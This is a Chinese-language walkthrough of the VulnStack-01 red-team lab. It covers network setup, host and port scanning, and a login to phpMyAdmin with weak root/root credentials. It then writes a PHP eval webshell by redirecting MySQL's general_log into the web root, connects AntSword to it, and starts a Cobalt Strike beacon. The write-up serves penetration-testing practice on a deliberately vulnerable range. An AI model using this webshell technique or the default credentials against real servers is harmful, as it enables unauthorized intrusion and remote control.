VulnStack-01 ATT&CK红队评估（一）

2023-02-13 153

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： VulnStack-01 ATT&CK红队评估

靶场信息

地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

发布日期：2019年10月20日 14:05

目标：上线三个管理员权限靶机

标签: 内网渗透 | Kill Chain | 域渗透 | 威胁情报

百度网盘：https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset

密码: 下载密码：n1u2

环境配置

32e81119709932b2cffc53dbdd41389d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816150309869

1）设置网卡信息

文章中的网卡设置如下

这里共使用了2张网卡，VMnet1和VMnet2，其中VMnet1连接有kali和第一个靶场，说明此网卡用来模拟公网ip，我本地使用NAT的VMnet8来代替，VMnet2内网网卡使用本地的VMnet6代替

a93f0ae7f8e565255f80e16648e4ed29_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

绘图3

查看第三个靶场的网卡配置

f01b3eca7ca359ad52c4f0b767331a7d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816224207514

查看第三个靶场的网卡配置，需要把我本地的VMnet6设置为

ip地址：192.168.52.1
子网掩码：255.255.255.0
默认网关：192.168.52.2

VMware虚拟网络配置

子网ip：192.168.52.0
子网掩码：255.255.255.0
DHCP
ip范围：192.168.52.3-254

86eaafbcc31a1a3d743d89e02fd35159_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816224611723

三个靶机网卡配置

第一个靶场windows7
双网卡：VMnet8（NAT）+VMnet6
这里需要注意，VMnet6的网卡所在的网络适配器IP是自定义的，NAT是自动获取，不能弄反
第二个靶场win2k3
网卡VMnet6
第三个靶场windows2008
网卡VMnet6
攻击机kali
网卡VMnet8（NAT）

2）win7靶机开启phpstudy

5e2a040e3d24209936174ba3c44ec427_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210817155537114

3）windows2008开启redis服务

c1e97a0fdea016974b82a5f47ff8a2e4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818231550535

一、信息收集

1）确定目标

使用netdiscover扫描10.0.1.0网段存活主机

netdiscover -r 10.0.1.0/24 -i eth0

得到ip地址：10.0.1.5

c81dd062b36f911e5a54945eef7a42fe_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2）端口扫描

nmap -v -T4 -p- -A -oN nmap.log 10.0.1.5

phpstudy开的80和3306

cb9bdc7ca19093dd40b4891f5ade36c1_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816230424517

3）访问靶机

http://10.0.1.5

探针里面已经泄露了网站的绝对路径

3df3784c750302113dc6bb623669ed19_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816230623436

尝试一下，可以访问phpmyadmin，且mysql是弱口令root/root毫无套路

4）上线蚁剑

http://10.0.1.5/phpmyadmin

通过phpstudy开启的服务，使用弱口令连接phpmyadmin

20ceb48fdc55abb717f0bd26672067c7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816231520381

写入webshell

show global variables like '%secure_file_priv%';
NULL    不允许导入或导出
/tmp    只允许在 /tmp 目录导入导出
空      不限制目录

这里是NULL，放弃这个into outfile，尝试写日志或者利用yxcms，既然在mysql窝里那就搞mysql吧

e2bd51a13df9bc62822da43860f7229e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816231919421

日志文件写 shell

SHOW VARIABLES LIKE 'general%';

eda16822eff387de80e87205ee2d7011_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816232940366

general_log 默认关闭，开启它可以记录用户输入的每条命令，会把其保存在对应的日志文件中。可以尝试自定义日志文件，并向日志文件里面写入内容的话，那么就可以成功 getshell：

# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/ch4nge.php';
# 查看当前配置
SHOW VARIABLES LIKE 'general%';

成功

a28b9c9983c3b7c3856ad327243f032b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816233127924

# 往日志里面写入 payload
select '<?php @eval($_POST[miss]);?>';
# 此时已经写到 ch4nge.php 文件当中了

4d32de010c014dd070bb61e9c87a010e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816233243292

蚁剑连接

连上了

869c8ff92b2e464c7d7738fac411e901_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816233333885

探测一下发现管理员权限还出网

a0c208ef8cdab3099519402e8e19900f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816233649426

5）补充：yxcms上线蚁剑方法

想搞yxcms可以参考我前面的文章https://www.freebuf.com/articles/web/277572.html

管理员登录需要修改r=admin

yxcms的默认用户名密码是admin/123456

在页面配置中可以修改页面源码，直接加入一句话就ok了。

6）上线CS

kali的ip是10.0.1.12，启动CS服务，建立监听生成远控马，蚁剑传进去执行上线

020186b490632fdb5ffd8f8a9c5c708b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816234136020